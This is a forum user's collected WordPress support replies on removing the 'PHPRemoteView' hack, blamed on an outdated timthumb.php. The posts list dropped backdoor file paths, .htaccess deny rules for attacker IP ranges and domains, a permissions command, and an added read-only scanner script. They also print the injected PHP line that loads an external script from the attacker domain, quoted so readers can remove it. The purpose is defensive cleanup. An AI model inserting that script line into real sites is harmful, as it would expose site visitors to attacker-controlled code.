OceansDB
Forum Replies Created
Forum: Fixing WordPress
In reply to: RSS Feed Crash
Make yourself a nice .htaccess file. Do you have a ban plugin for wordpress? If yes, ban the ip + ip range.
@cbmc In your account’s root folder.
You can read the full thread here:
PHPRemoteView Hack: What it is, and how to remove it | TechSpheria https://bit.ly/oRgMnJ
Don’t forget to delete the phony files in your WordPress installation!
There are 6 now:
/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php
A new domain popped up, so you have to change your .htaccess (not inside public_html) and replace the lines with this:
order allow,deny
deny from 91.220
deny from 91.196
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all
If you don’t have an .htaccess file there, make one.
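A read-only check for the six file paths and the two domains named in this thread, added here as an example and not part of the original posts. The `scan_wp` function name and its output format are assumptions; it only lists findings and deletes nothing.

```bash
#!/usr/bin/env bash
# Added example (not from the thread): list the indicators the posts describe.
# Usage: ./scan_wp.sh /path/to/wordpress   (script name is hypothetical)

# The six file paths named in the thread, relative to the WordPress root.
PHONY_FILES="wp-admin/js/config.php
wp-admin/common.php
wp-admin/udp.php
wp-content/udp.php
wp-content/uploads/feed-file.php
wp-content/uploads/feed-files.php"

# Matches superpuperdomain.com and superpuperdomain2.com from the thread.
BAD_DOMAIN_RE='superpuperdomain[0-9]*\.com'

# scan_wp ROOT: prints one finding per line; returns 0 if clean, 1 otherwise.
scan_wp() {
    root=${1%/}
    found=0
    # 1. Files the thread says were dropped into the installation.
    while IFS= read -r rel; do
        if [ -e "$root/$rel" ]; then
            printf 'FILE %s\n' "$rel"
            found=1
        fi
    done <<EOF
$PHONY_FILES
EOF
    # 2. PHP files that reference the injected script's host. The post names
    #    index.php; every .php file is checked. grep -l prints names only.
    hits=$(find "$root" -type f -name '*.php' \
               -exec grep -lE "$BAD_DOMAIN_RE" {} + 2>/dev/null || true)
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits" | while IFS= read -r f; do
            printf 'DOMAIN %s\n' "${f#"$root"/}"
        done
        found=1
    fi
    return "$found"
}

# Run only when a directory is given on the command line.
if [ "$#" -gt 0 ]; then
    scan_wp "$1"
fi
```

A `FILE` line means one of the listed paths exists; a `DOMAIN` line means a PHP file mentions one of the listed domains and should be inspected by hand.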
Forum: Fixing WordPress
In reply to: RSS Feed Crash
@everybody please don’t forget to delete the phony files as well.
There are 6 now:
/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php
A new domain popped up, so you have to change your .htaccess (not inside public_html) and replace the lines with this:
order allow,deny
deny from 91.220
deny from 91.196
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all
Y’all have to read my post here:
WordPress › Support » RSS Feed Crash https://bit.ly/ojQ4sC
Gave all the details on this bug in that topic.
Forum: Plugins
In reply to: [WordPress HTTPS (SSL)] Two Strange Errors
It is not your plugin. Timthumb.php has a security leak. The TS (topic starter) has to update his timthumb script.
Forum: Plugins
In reply to: [WordPress HTTPS (SSL)] Two Strange Errors
Going to quote my post for y’all
Hello,
I have/had a similar problem, not with my rss though.
You should read the following about superpuperdomain.com
What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.
Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.
I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.
I scoured the Internet and finally found a fix.
First, in your WordPress’s index.php, remove the following script added by the hack:
echo '<script type="text/javascript" language="javascript" src="https://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';
Then remove three phony files added by the hackers (back up first, in case your installation actually requires these files):
/wp-admin/js/config.php
/wp-admin/common.php
/wp-content/udp.php
Do not try to open any of these files, as my antivirus sounded alarms immediately.
I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.
To increase your site’s security, make sure you have correct permissions for files and directories.
Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.
Run this bash command to set the correct permissions recursively for your WordPress installation:
find /wordpressdirectory -type d -exec chmod 755 {} + && find /wordpressdirectory -type f -exec chmod 644 {} +
I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):
order allow,deny
deny from 91.220
allow from all
The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.
Source: Techspheria
https://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/
Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php…. Just in case.
I guess we have to keep monitoring the website TechSpheria, because yesterday they said there were two phony files, today there are three.
Kind regards, OceansDB
Forum: Fixing WordPress
In reply to: RSS Feed Crash
There is another file in wp-content called udp.php.
I think just ban the IP range and do a backtrack on the website to get the direct IP address, and ban it as well. Just in case.
If you updated your timthumb.php, they can’t place anything else on your website.
Forum: Fixing WordPress
In reply to: RSS Feed Crash
Hello,
I have/had a similar problem, not with my rss though.
You should read the following about superpuperdomain.com
What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.
Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.
I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.
I scoured the Internet and finally found a fix.
First, in your WordPress’s index.php, remove the following script added by the hack:
echo '<script type="text/javascript" language="javascript" src="https://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';
Then remove two phony files added by the hackers (back up first, in case your installation actually requires these files):
/wp-admin/js/config.php
/wp-admin/common.php
Do not try to open any of these files, as my antivirus sounded alarms immediately.
I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.
To increase your site’s security, make sure you have correct permissions for files and directories.
Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.
Run this bash command to set the correct permissions recursively for your WordPress installation:
find /wordpressdirectory -type d -exec chmod 755 {} + && find /wordpressdirectory -type f -exec chmod 644 {} +
I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):
order allow,deny
deny from 91.220
allow from all
The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.
Source: Techspheria
https://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/
Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php…. Just in case.